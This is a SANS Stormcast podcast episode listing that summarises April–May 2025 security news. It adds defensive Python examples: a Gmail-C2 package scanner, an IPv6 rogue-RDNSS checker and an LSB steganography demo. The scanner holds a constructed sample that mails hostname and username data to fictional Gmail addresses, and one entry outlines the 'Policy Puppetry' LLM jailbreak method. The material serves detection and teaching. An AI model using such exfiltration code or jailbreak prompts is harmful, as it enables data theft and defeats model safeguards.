SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)


Podcast by Johannes B. Ullrich

A brief daily summary of what is important in information security. The podcast is published every weekday and is designed to get you ready for the day with a brief, usually five-minute, summary of current network-security-related events. The content is late-breaking and educational, and is based on listener input as well as on data received by the SANS Internet Stormcenter. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .


All episodes

5140 episodes
SANS Stormcast Friday, May 2nd: More Steganography; Malicious Python Packages GMail C2; BEC to Steal Rent Payments

Steganography Analysis With pngdump.py: Bitstreams
More details from Didier on how to extract binary content hidden inside images.
https://isc.sans.edu/diary/Steganography%20Analysis%20With%20pngdump.py%3A%20Bitstreams/31904

Using Trusted Protocols Against You: Gmail as a C2 Mechanism
Attackers are using typosquatting to trick developers into installing malicious Python packages. Once installed, the packages use Gmail as a command-and-control channel, sending email to hard-coded Gmail accounts so that the C2 traffic looks like ordinary mail to a trusted provider.
https://socket.dev/blog/using-trusted-protocols-against-you-gmail-as-a-c2-mechanism

Security Brief: French BEC Threat Actor Targets Property Payments
A French business email compromise (BEC) actor is targeting property management firms, sending emails to their tenants that trick them into paying rent into fake bank accounts.
https://www.proofpoint.com/us/blog/threat-insight/security-brief-french-bec-threat-actor-targets-property-payments

SANS.edu Research Journal
https://isc.sans.edu/j/research

2 May 2025 - 7 min
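The two halves of the Gmail C2 story above, the typosquatted name and the hard-coded mail infrastructure, are both things a package-intake pipeline can check statically before anything is installed. The following is an added example written for this page; it is not code from the Socket report and does not reproduce any real package. The two sample modules are constructed, the Gmail addresses in them are fictional, and the short list of "popular" package names stands in for the real top-downloads list you would use in practice.

```python
"""Static triage of a Python package for the typosquat-plus-Gmail-C2 pattern.

Added illustration; not code from the Socket report or from any real package.
The sample modules below are constructed, and the Gmail addresses in them are
fictional.  The idea: a package whose source both imports a mail library and
hard-codes Gmail infrastructure has no business doing so and deserves a look.
"""
import ast
import difflib
import re
from dataclasses import dataclass

GMAIL_HOSTS = {"smtp.gmail.com", "imap.gmail.com"}
GMAIL_ADDR = re.compile(r"[\w.+-]+@gmail\.com", re.IGNORECASE)
MAIL_LIBS = {"smtplib", "imaplib"}

# Stand-in allowlist of legitimate names; a real check would use the
# top-N PyPI download list.
POPULAR = {"requests", "urllib3", "numpy", "cryptography", "colorama"}


@dataclass
class Finding:
    line: int
    kind: str   # "mail-lib", "gmail-host" or "gmail-addr"
    detail: str


def typosquat_candidates(name: str, cutoff: float = 0.8) -> list[str]:
    """Popular names this package name is suspiciously close to (but not equal)."""
    return [p for p in difflib.get_close_matches(name, POPULAR, n=3, cutoff=cutoff)
            if p != name]


def scan_source(src: str) -> list[Finding]:
    """Walk the AST: record mail-library imports and Gmail string constants."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in MAIL_LIBS:
                    findings.append(Finding(node.lineno, "mail-lib", alias.name))
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in MAIL_LIBS:
                findings.append(Finding(node.lineno, "mail-lib", node.module))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value in GMAIL_HOSTS:
                findings.append(Finding(node.lineno, "gmail-host", node.value))
            for addr in GMAIL_ADDR.findall(node.value):
                findings.append(Finding(node.lineno, "gmail-addr", addr))
    return findings


def is_suspicious(findings: list[Finding]) -> bool:
    """Mail library imported AND a Gmail host/address hard-coded in the same module."""
    kinds = {f.kind for f in findings}
    return "mail-lib" in kinds and bool(kinds & {"gmail-host", "gmail-addr"})


# Constructed sample resembling the reported behaviour (fictional addresses).
MALICIOUS_SAMPLE = '''
import os, smtplib, socket

def _report():
    msg = "host=%s user=%s" % (socket.gethostname(), os.getlogin())
    s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    s.login("fake.sender.0000@gmail.com", "app-password-here")
    s.sendmail("fake.sender.0000@gmail.com", "fake.c2.inbox.0000@gmail.com", msg)
'''

# Constructed benign sample: no mail library, no Gmail strings.
BENIGN_SAMPLE = '''
import json

def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    print("typosquat of:", typosquat_candidates("reqeusts"))
    for f in scan_source(MALICIOUS_SAMPLE):
        print(f"line {f.line}: {f.kind} {f.detail}")
    print("suspicious:", is_suspicious(scan_source(MALICIOUS_SAMPLE)))
```

Run it over every .py file in an unpacked wheel or sdist before the package is allowed into an internal mirror. The string scan is deliberately naive; obfuscated samples (base64 hostnames, string concatenation) will slip past it, which is exactly why the import check and the name-distance check are combined rather than relied on alone.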
SANS Stormcast Thursday, May 1st: Sonicwall Attacks; Cached Windows RDP Credentials

Web Scanning Sonicwall for CVE-2021-20016
For the last week, scans for SonicWall API login and domain endpoints have skyrocketed. The requests may be exploiting the older CVE-2021-20016 vulnerability or simply attempting to brute-force credentials.
https://isc.sans.edu/diary/Web%20Scanning%20Sonicwall%20for%20CVE-2021-20016/31906

TheWizards APT Group: SLAAC Spoofing Adversary-in-the-Middle Attacks
ESET published details of an IPv6-based attack they have observed. The attackers send rogue router advertisements, which SLAAC-configured hosts accept, and use them to hand out a malicious recursive DNS server. That resolver returns attacker-controlled IP addresses for the hostnames software uses to fetch updates, so the victim downloads malware instead of the legitimate update.
https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/

Windows RDP Access is Possible with Old Credentials
Credential caching may lead to Windows allowing RDP logins with passwords that have since been changed or revoked.
https://arstechnica.com/security/2025/04/windows-rdp-lets-you-log-in-using-revoked-passwords-microsoft-is-ok-with-that/?comments-page=1#comments

1 May 2025 - 6 min
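The SLAAC spoofing attack above works because hosts will take a recursive DNS server from whatever Router Advertisement arrives on the link (RFC 8106 RDNSS option). The following is an added example written for this page, not ESET's code: it parses the ICMPv6 RA option list, pulls out every RDNSS-advertised resolver, and flags any that are not on the resolvers the network is supposed to have. The RA it parses is a constructed fixture with a zero checksum, a made-up MAC and addresses from the 2001:db8::/32 documentation range; wire formats follow RFC 4861 and RFC 8106.

```python
"""Parse ICMPv6 Router Advertisements and flag RDNSS-advertised resolvers
that are not on an allowlist.

Added illustration of the SLAAC-spoofing mechanism described above; not
ESET's code.  Wire formats follow RFC 4861 (RA header, ND options) and
RFC 8106 (RDNSS option, type 25).  The RA built below is a constructed
fixture: its checksum is left zero, the MAC is made up and the addresses
are from the 2001:db8::/32 documentation range.
"""
import ipaddress
import struct

ND_ROUTER_ADVERT = 134
OPT_SOURCE_LLADDR = 1
OPT_RDNSS = 25


def parse_nd_options(icmpv6: bytes):
    """Yield (type, body) for each option after the 16-byte RA header.

    Option length is in units of 8 octets and includes the 2-byte header;
    RFC 4861 requires a zero length to be treated as an error.
    """
    if len(icmpv6) < 16 or icmpv6[0] != ND_ROUTER_ADVERT:
        raise ValueError("not a Router Advertisement")
    off = 16
    while off < len(icmpv6):
        if len(icmpv6) - off < 2:
            raise ValueError("truncated option header")
        otype, olen = icmpv6[off], icmpv6[off + 1]
        if olen == 0:
            raise ValueError("zero-length option")
        end = off + olen * 8
        if end > len(icmpv6):
            raise ValueError("option overruns packet")
        yield otype, icmpv6[off + 2:end]
        off = end


def rdnss_servers(icmpv6: bytes) -> list[tuple[ipaddress.IPv6Address, int]]:
    """Recursive DNS servers (with lifetime) pushed by the RA's RDNSS options."""
    servers = []
    for otype, body in parse_nd_options(icmpv6):
        if otype != OPT_RDNSS:
            continue
        # RDNSS body: reserved(2) lifetime(4) then one or more 16-byte addresses
        (lifetime,) = struct.unpack("!I", body[2:6])
        addrs = body[6:]
        for i in range(0, len(addrs) - len(addrs) % 16, 16):
            servers.append((ipaddress.IPv6Address(addrs[i:i + 16]), lifetime))
    return servers


def rogue_resolvers(icmpv6: bytes, allowlist) -> list[ipaddress.IPv6Address]:
    """Advertised resolvers that are not the ones this network is supposed to have."""
    allowed = {ipaddress.IPv6Address(a) for a in allowlist}
    return [addr for addr, _ in rdnss_servers(icmpv6) if addr not in allowed]


def is_well_formed(icmpv6: bytes) -> bool:
    """True if every option fits inside the packet with a non-zero length."""
    try:
        list(parse_nd_options(icmpv6))
        return True
    except ValueError:
        return False


def build_ra(dns_servers, lifetime: int = 1800) -> bytes:
    """Constructed RA fixture: header, Source Link-Layer Address, one RDNSS option."""
    hdr = struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0,   # type, code, checksum (0)
                      64, 0, 1800, 0, 0)                      # hop limit, flags, lifetimes
    slla = bytes([OPT_SOURCE_LLADDR, 1]) + bytes.fromhex("02aabbccddee")  # made-up MAC
    addrs = b"".join(ipaddress.IPv6Address(a).packed for a in dns_servers)
    rdnss = struct.pack("!BBHI", OPT_RDNSS, 1 + 2 * len(dns_servers), 0, lifetime) + addrs
    return hdr + slla + rdnss


if __name__ == "__main__":
    # A rogue router advertising the legitimate resolver alongside its own.
    ra = build_ra(["2001:db8:1::53", "2001:db8:bad::53"])
    print("rogue:", [str(a) for a in rogue_resolvers(ra, ["2001:db8:1::53"])])
```

Feed it the ICMPv6 payload of RAs captured on the segment (a packet capture filter of icmp6 type 134 is enough) to see who is advertising resolvers and which ones do not belong. The fix on the network side is RA Guard (RFC 6105) on access switches; on hosts that do not need RA-supplied DNS, ignoring RDNSS entirely closes this path.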
SANS Stormcast Wednesday, April 30th: SMS Attacks; Apple Airplay Vulnerabilities

More Scans for SMS Gateways and APIs
Attackers are not only looking for SMS gateways, as in the scans we reported on last week, but are also actively scanning for other APIs and add-on tools that would let them send messages using other people's credentials.
https://isc.sans.edu/diary/More%20Scans%20for%20SMS%20Gateways%20and%20APIs/31902

AirBorne: AirPlay Vulnerabilities
Researchers at Oligo disclosed over 20 weaknesses they found in Apple's implementation of the AirPlay protocol. The vulnerabilities can be abused to execute code on, or launch denial-of-service attacks against, affected devices. Apple patched them in recent updates.
https://www.oligo.security/blog/airborne

30 Apr 2025 - 8 min
SANS Stormcast Tuesday, April 29th: SRUM-DUMP 3; Policy Puppetry; Choice Jacking; @sansinstitute at #RSAC

SRUM-DUMP Version 3: Uncovering Malware Activity in Forensics
Mark Baggett released SRUM-DUMP version 3. The tool simplifies data extraction from the Windows System Resource Usage Monitor (SRUM). This database records, for about 30 days, how many resources each program used, which makes it invaluable for establishing which software was executed, when, and whether it sent or received network data.
https://isc.sans.edu/diary/SRUM-DUMP%20Version%203%3A%20Uncovering%20Malware%20Activity%20in%20Forensics/31896

Novel Universal Bypass for All Major LLMs
HiddenLayer discovered a new prompt injection technique that bypasses the security constraints of large language models. The technique prefixes the prompt with an XML-formatted block that the LLM interprets as a policy file; this "Policy Puppetry" can be used to rewrite some of the security policies configured for the model. Unlike other techniques, it works across multiple LLMs without changing the policy text.
https://hiddenlayer.com/innovation-hub/novel-universal-bypass-for-all-major-llms/

CHOICEJACKING: Compromising Mobile Devices through Malicious Chargers like a Decade ago
The old juice jacking attack is back, at least for devices not running the latest version of Android or iOS. The issue may allow a malicious USB device, in particular a USB charger, to take control of a device connected to it.
https://pure.tugraz.at/ws/portalfiles/portal/89650227/Final_Paper_Usenix.pdf

SANS @RSA: https://www.sans.org/mlp/rsac/

29 Apr 2025 - 7 min
SANS Stormcast Monday, April 28th: Image Steganography; SAP Netweaver Exploited

Example of a Payload Delivered Through Steganography
Xavier and Didier published two diaries this weekend that build on each other. First, Xavier showed an example of an image being used to smuggle an executable past network defenses; second, Didier showed how to use his tools to extract the binary.
https://isc.sans.edu/diary/Example%20of%20a%20Payload%20Delivered%20Through%20Steganography/31892

SAP NetWeaver Exploited: CVE-2025-31324
An arbitrary file upload vulnerability in SAP's NetWeaver product is being actively exploited to upload webshells. ReliaQuest discovered the issue and reports seeing it abused to deploy the Brute Ratel C2 framework. NetWeaver users should disable the developmentserver alias and turn off Visual Composer, a component that has been deprecated for about ten years. SAP has released an emergency update for the issue.
https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/

Any.Run Reports False Positive Uploads
Because Microsoft Defender XDR falsely flagged Adobe Acrobat Cloud links as malicious, many users of Any.Run's free tier uploaded confidential documents to Any.Run for analysis. Any.Run has blocked these uploads for now, but reminded users to be careful about which documents they upload to a sandbox.
https://x.com/anyrun_app/status/1915429758516560190

28 Apr 2025 - 7 min
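Both steganography diaries above (Xavier's smuggled executable and Didier's pngdump.py bitstream extraction) come down to the same mechanic: the payload is spread one bit per channel byte across the image's least-significant bits, and the analyst has to reassemble the bitstream in the right order. The following is an added example written for this page; it is not pngdump.py and not Xavier's sample. It embeds a length-prefixed payload into the LSBs of raw channel bytes and carves it back out, then runs the kind of cheap "is this a PE?" check you would apply to the carved blob. It works on decoded channel bytes, which for a PNG means the data after inflating IDAT and undoing the per-scanline filters; the cover is pseudo-random constructed data and the payload is a constructed string that merely starts with an MZ header, not an executable.

```python
"""LSB bitstream steganography: embed a length-prefixed payload in the
least-significant bits of image channel bytes and carve it back out.

Added illustration of the bitstream extraction the two diaries above work
through; not Didier's pngdump.py or Xavier's sample.  It operates on raw
decoded channel bytes (for a PNG, the data after inflating IDAT and undoing
the per-scanline filters).  The cover and the payload are constructed; the
payload only starts with an MZ header to show the carving check, it is not
an executable.
"""
import random
import struct


def make_cover(n_channels: int, seed: int = 1) -> bytearray:
    """Deterministic pseudo-random channel bytes standing in for pixel data."""
    rng = random.Random(seed)
    return bytearray(rng.getrandbits(8) for _ in range(n_channels))


def _bits_msb_first(data: bytes):
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed_lsb(channels: bytes, payload: bytes) -> bytearray:
    """Write a 32-bit big-endian length then the payload, one bit per channel LSB."""
    frame = struct.pack("!I", len(payload)) + payload
    if len(frame) * 8 > len(channels):
        raise ValueError("cover too small for payload")
    out = bytearray(channels)
    for i, bit in enumerate(_bits_msb_first(frame)):
        out[i] = (out[i] & 0xFE) | bit
    return out


def extract_lsb(channels: bytes) -> bytes:
    """Reassemble the LSB bitstream; refuse lengths the cover cannot hold."""
    def read_bytes(start_bit: int, count: int) -> bytes:
        buf = bytearray()
        for b in range(count):
            v = 0
            for k in range(8):
                v = (v << 1) | (channels[start_bit + b * 8 + k] & 1)
            buf.append(v)
        return bytes(buf)

    if len(channels) < 32:
        raise ValueError("cover too small to hold a length field")
    (length,) = struct.unpack("!I", read_bytes(0, 4))
    if 32 + length * 8 > len(channels):
        # Typical result on an innocent image or on the wrong channel layout.
        raise ValueError("declared length exceeds cover; not an LSB stream of this layout")
    return read_bytes(32, length)


def looks_like_pe(data: bytes) -> bool:
    """Cheap carving check: Windows executables start with the 'MZ' DOS header."""
    return data[:2] == b"MZ"


def lsb_changes(cover: bytes, stego: bytes) -> int:
    """How many channel bytes differ; at most one bit each, so visually invisible."""
    return sum(a != b for a, b in zip(cover, stego))


if __name__ == "__main__":
    cover = make_cover(4096)
    payload = b"MZ\x90\x00 constructed stand-in, not a real PE"
    stego = embed_lsb(cover, payload)
    recovered = extract_lsb(stego)
    print(recovered == payload, looks_like_pe(recovered), lsb_changes(cover, stego))
```

The length prefix and MSB-first bit order are this example's own conventions; real samples pick their own (bit order, channel order, stride, a magic marker instead of a length), which is why a tool like pngdump.py exposes the raw bitstream for the analyst to try layouts against rather than assuming one.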